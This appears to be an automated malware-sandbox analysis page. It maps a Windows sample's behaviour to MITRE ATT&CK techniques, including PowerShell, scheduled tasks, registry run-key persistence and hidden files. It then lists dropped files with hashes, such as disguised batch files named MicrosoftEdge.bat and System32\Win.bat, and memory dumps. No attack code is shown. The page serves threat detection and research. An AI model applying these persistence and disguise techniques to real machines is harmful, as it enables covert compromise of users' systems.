C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:4440

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
PID:4196

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
1⤵
PID:4696

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:1880

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\ubcore\MicrosoftEdge.bat

Filesize
440KB

MD5
e484f05f1d6bb25017695938f8f9d1dc

SHA1
31b317dbf41bea5ef0e1338ba1dfedb019c4a606

SHA256
bad67dd9454a5d74dd958eda8ac49c6682d798d3182aeeb1ee198ce3e66f5109

SHA512
27375f90ca85c1a1393a1bfa243abdce413bca3a4cfde9ef80a890c93ed0b16f79ce1111671ba2a6fb6f12e5c1dfe6f0c026bc1ced01c24f7a106eaaaecd6984

Download Submit
C:\ProgramData\ubcore\temp.vbs

Filesize
121B

MD5
b3ef74b9435a0ac8e22becd32fae71d2

SHA1
0dea14aa66cfed204cd1a38c19806951502e8578

SHA256
8a767dcc8143ffa3c87374ddd917175b4370af592c8f69ece154335b5c3230d0

SHA512
9a1351c0fe9d5ad42fb81c58d3f6c0eadad23f08d5b9834b6d9240f5a5430ceb74808e333577ae23225ce8961f48392c5c14b0037657eb3e8fdc66f3d79101a2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
dc058ebc0f8181946a312f0be99ed79c

SHA1
0c6f376ed8f2d4c275336048c7c9ef9edf18bff0

SHA256
378701e87dcff90aa092702bc299859d6ae8f7e313f773bf594f81df6f40bf6a

SHA512
36e0de64a554762b28045baebf9f71930c59d608f8d05c5faf8906d62eaf83f6d856ef1d1b38110e512fbb1a85d3e2310be11a7f679c6b5b3c62313cc7af52aa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
a0486d6f8406d852dd805b66ff467692

SHA1
77ba1f63142e86b21c951b808f4bc5d8ed89b571

SHA256
c0745fd195f3a51b27e4d35a626378a62935dccebefb94db404166befd68b2be

SHA512
065a62032eb799fade5fe75f390e7ab3c9442d74cb8b520d846662d144433f39b9186b3ef3db3480cd1d1d655d8f0630855ed5d6e85cf157a40c38a19375ed8a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
480B

MD5
94e8494c6ca5ee58b50c8ec2d4557e5d

SHA1
4c284b54b28907d48cd16fa5616b70e33c72c848

SHA256
16b3293cddeefbb7d02dab0898c7c64d2c555450a9a51bc20105c18be7f2f604

SHA512
c2340311d00bbab26887772df0f817e2f3311c2ef9358408624a57b6dc676faad5d1ff1af9f5697a4dd340eb8d97bf61a4e6d9d3ae118204c7ac570a127a4165

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
6990b069d3cc1ac79af8ed6091f04f5e

SHA1
b2139d8561be98d48dd1719adf5fb4f02cf60b6b

SHA256
02fb6e2897237f4995a89172fbf0c66a125710cd66d43dfa88644d403f220027

SHA512
48014522c50b68053e00be67e3b2e4255e218c32c316fe61dd5a93010d9c7b9ffefde8a4de1df4326a530b10c40aa44cb273a04e70532fbcae0eb789d213644b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
22b9604b678a93909686f6bf2283a56f

SHA1
c9958e33883c7a771f9bced9af2791d6dc92554e

SHA256
a362d00cbfbe12a727d0c0eb1e930f2806df010c177cb54789c4a69496d9f73c

SHA512
a9120d37168f957218e5086b112e257fad80c3fbbc41f07eaede044afe9387eb569a3d31d7c275bf49136558b0e49d2593a294d9d4f296b60bf7bb25f4e5fdec

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
97dfcc57790ae82d7a1033115af21281

SHA1
606d690913bc2d9f6f886063dd89c13955c1a0e8

SHA256
3cad5de315982e4500f6cf6f0a36263971286fcaa0a487022852289d3a4215f6

SHA512
dc783e10a4a036e4bd06a934d9f325e69af748a6a192e31a8fb6cb8dfbaa501a6fa356dbf3245c844db1028c92c6c6ae882a1006361d1d86f25393bff5c112f6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
d8b9a260789a22d72263ef3bb119108c

SHA1
376a9bd48726f422679f2cd65003442c0b6f6dd5

SHA256
d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

SHA512
550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
96ff1ee586a153b4e7ce8661cabc0442

SHA1
140d4ff1840cb40601489f3826954386af612136

SHA256
0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8

SHA512
3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
ef647504cf229a16d02de14a16241b90

SHA1
81480caca469857eb93c75d494828b81e124fda0

SHA256
47002672443e80410e55a0b6d683573ac27d70d803b57ee3c2818d1008669710

SHA512
a6d8c08c708eee6f7e700880ce79d2ba7cd0acbe8529d96e18f3e90ea1f3cf33fd801dd6eba6017cdd02769e968c48278c090c1deeac710124f79423cd862ee1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
ba169f4dcbbf147fe78ef0061a95e83b

SHA1
92a571a6eef49fff666e0f62a3545bcd1cdcda67

SHA256
5ef1421e19fde4bc03cd825dd7d6c0e7863f85fd8f0aa4a4d4f8d555dc7606d1

SHA512
8d2e5e552210dcda684682538bc964fdd8a8ff5b24cc2cc8af813729f0202191f98eb42d38d2355df17ae620fe401aad6ceaedaed3b112fdacd32485a3a0c07c

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qc41i5sc.yxv.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\bins\upz.bat

Filesize
1KB

MD5
91417f5793c4b65006aec9a90510dec5

SHA1
efb2f90de78e2b4cca39fec42cbc6e8d7800f8fd

SHA256
918e8eeca9b6164982bb0b4175f13910bfcb2771eee62aa77cb38863db5980e3

SHA512
74c742cd2ae2d5fc03399cec660c22ea50588394bb5e434990b2628af7f0c5a6c0d00fe31a7624aa6923c8b6f4867fa1122cd5fc2ac88e2eae40776f7d44ac2c

Download Submit
C:\Users\Admin\AppData\Local\Temp\upx.bat

Filesize
227B

MD5
e2ff22959b9c05c96591bd6d1a92b196

SHA1
939279f1e59885efe82f0302c7a313ea1447796d

SHA256
f71df26be236fdf5eef0e711a026d9ef0a9e46cef72517429dd7eb7cb34a9ca9

SHA512
992f7bc7d69ada2b0b369958f7a30c19ed392ee681bc115d59336fb825bc553f98ab77143bd7a95a3bb8da5f6440954dd1c91c80430fa1168427a8f461923087

Download Submit
C:\Users\Admin\AppData\Local\Temp\upx.bat

Filesize
1KB

MD5
dd6c4ac9dff2074f20b8f1d1a91f4c1d

SHA1
fca7827ff26c349a0b53e00f0a069fdda7a438bf

SHA256
2869755fceec0c6a2dac45fe478de29d3bcd8053c7f820b18d403f7681cb4a50

SHA512
097042002e7f94294ae63241bfb31bb492bc49c3df396c68ddd14fd55a444200952ad19e23c140b7421dda685d8d666faf1c6db1a4ff566ca51ca61f4eed5e16

Download Submit
C:\Windows\System32\Win.bat

Filesize
2KB

MD5
70f824e73c7e2e16c9903932bfac9e41

SHA1
9c68e790b2cc1e9ec664c41238b460b0ee5812a2

SHA256
ae4d0c7a50d2189eab98d0a106586887f64b708d4cda06c88d607cc293580b6e

SHA512
df983d6d3a9848a33e5668c7daca774f2d4231b2a41d39cb3fd32d1ad04894686bf0566477562f97c7c32df9d7a050b1797f3ded9c9a13e9c2e17e97da355540

Download Submit
\??\pipe\LOCAL\crashpad_1680_FDMGDGYXMJTCBUVC

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/388-206-0x00007FF9F8E30000-0x00007FF9F8E40000-memory.dmp

Filesize
64KB

Download
memory/780-227-0x00007FF9F8E30000-0x00007FF9F8E40000-memory.dmp

Filesize
64KB

Download
memory/952-235-0x00007FF9F8E30000-0x00007FF9F8E40000-memory.dmp

Filesize
64KB

Download
memory/1100-237-0x00007FF9F8E30000-0x00007FF9F8E40000-memory.dmp

Filesize
64KB

Download
memory/1116-239-0x00007FF9F8E30000-0x00007FF9F8E40000-memory.dmp

Filesize
64KB

Download
memory/1156-230-0x00007FF9F8E30000-0x00007FF9F8E40000-memory.dmp

Filesize
64KB

Download
memory/1172-219-0x00007FF9F8E30000-0x00007FF9F8E40000-memory.dmp

Filesize
64KB

Download
memory/1304-225-0x00007FF9F8E30000-0x00007FF9F8E40000-memory.dmp

Filesize
64KB

Download
memory/1376-167-0x00007FF9F8E30000-0x00007FF9F8E40000-memory.dmp

Filesize
64KB

Download
memory/1536-207-0x00007FF9F8E30000-0x00007FF9F8E40000-memory.dmp

Filesize
64KB

Download
memory/1544-221-0x00007FF9F8E30000-0x00007FF9F8E40000-memory.dmp

Filesize
64KB

Download
memory/1556-229-0x00007FF9F8E30000-0x00007FF9F8E40000-memory.dmp

Filesize
64KB

Download
memory/1704-231-0x00007FF9F8E30000-0x00007FF9F8E40000-memory.dmp

Filesize
64KB

Download
memory/1764-228-0x00007FF9F8E30000-0x00007FF9F8E40000-memory.dmp

Filesize
64KB

Download
memory/1880-217-0x00007FF9F8E30000-0x00007FF9F8E40000-memory.dmp

Filesize
64KB

Download
memory/1928-223-0x00007FF9F8E30000-0x00007FF9F8E40000-memory.dmp

Filesize
64KB

Download
memory/2052-234-0x00007FF9F8E30000-0x00007FF9F8E40000-memory.dmp

Filesize
64KB

Download
memory/2528-222-0x00007FF9F8E30000-0x00007FF9F8E40000-memory.dmp

Filesize
64KB

Download
memory/2536-220-0x00007FF9F8E30000-0x00007FF9F8E40000-memory.dmp

Filesize
64KB

Download
memory/2684-238-0x00007FF9F8E30000-0x00007FF9F8E40000-memory.dmp

Filesize
64KB

Download
memory/3224-236-0x00007FF9F8E30000-0x00007FF9F8E40000-memory.dmp

Filesize
64KB

Download
memory/3296-224-0x00007FF9F8E30000-0x00007FF9F8E40000-memory.dmp

Filesize
64KB

Download
memory/3408-166-0x00007FF9F8E30000-0x00007FF9F8E40000-memory.dmp

Filesize
64KB

Download
memory/3408-164-0x0000000008920000-0x000000000894A000-memory.dmp

Filesize
168KB

Download
memory/3436-233-0x00007FF9F8E30000-0x00007FF9F8E40000-memory.dmp

Filesize
64KB

Download
memory/3604-218-0x00007FF9F8E30000-0x00007FF9F8E40000-memory.dmp

Filesize
64KB

Download
memory/4196-232-0x00007FF9F8E30000-0x00007FF9F8E40000-memory.dmp

Filesize
64KB

Download
memory/4440-226-0x00007FF9F8E30000-0x00007FF9F8E40000-memory.dmp

Filesize
64KB

Download
memory/4504-97-0x000001CE30630000-0x000001CE3077E000-memory.dmp

Filesize
1.3MB

Download
memory/4504-90-0x000001CE303C0000-0x000001CE303E2000-memory.dmp

Filesize
136KB

Download
memory/5336-114-0x000001BEB0410000-0x000001BEB062C000-memory.dmp

Filesize
2.1MB

Download
memory/5980-162-0x000001A5D2CE0000-0x000001A5D2D2E000-memory.dmp

Filesize
312KB

Download
memory/5980-161-0x000001A5D2CD0000-0x000001A5D2CD8000-memory.dmp

Filesize
32KB

Download
memory/5980-163-0x000001A5D2F90000-0x000001A5D2FA8000-memory.dmp

Filesize
96KB

Download
memory/5980-159-0x000001A5D3010000-0x000001A5D3086000-memory.dmp

Filesize
472KB

Download
memory/5980-155-0x000001A5D2F40000-0x000001A5D2F84000-memory.dmp

Filesize
272KB

Download
memory/5980-318-0x000001A5D35D0000-0x000001A5D35DE000-memory.dmp

Filesize
56KB

Download